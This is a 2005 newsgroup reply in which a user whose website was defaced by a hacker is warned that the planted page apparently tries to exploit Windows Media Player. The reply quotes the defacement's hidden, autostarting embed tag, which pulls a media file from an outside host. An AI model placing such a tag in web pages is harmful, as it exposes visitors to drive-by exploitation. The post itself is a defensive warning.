 Organizations / Canada / rtlToronto / 14195
Re: HACKED by AKINCILAR --OT-- and harsh language
Newsgroups:
lugnet.org.ca.rtltoronto
Date:
Tue, 19 Jul 2005 10:08:55 GMT

On Tue, Jul 19, 2005 at 05:18:46AM +0000, Calum Tsang wrote:

i just spent one HOUR cleaning up my site.  little script kiddy punk
hacked my host's ISS box and dropped 9 files in EVERY FOLDER!!!

If you get angry, then the skript-kiddiez have won.

Hate to say it, but if you use ISS, the kiddies have won too.

Btw, I'd recommend removing the hacked page from the server, or at least
warning people who go see it.  I believe it tries to exploit a
vurnerability in windows media player - so if you view it in IE, well,
don't view it on windows at all:

<embed src="http://members.lycos.co.uk/sesizzzz/hucum marsi.wma"
loop="1" autostart="true" hidden "true" width="65" height="18"></td></p>

Dan Boger
dan@peeron.com